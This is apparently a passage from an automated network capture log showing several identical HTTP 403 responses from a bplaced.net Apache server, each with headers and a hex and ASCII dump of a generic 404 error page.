                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:19.344508886 CEST14290INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:19 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=88
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:50:20.183646917 CEST14298INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:20 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=121
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:21.236571074 CEST14306INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:21 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=84
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:50:22.166436911 CEST14314INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:22 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=111
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:23.772872925 CEST14322INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:23 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
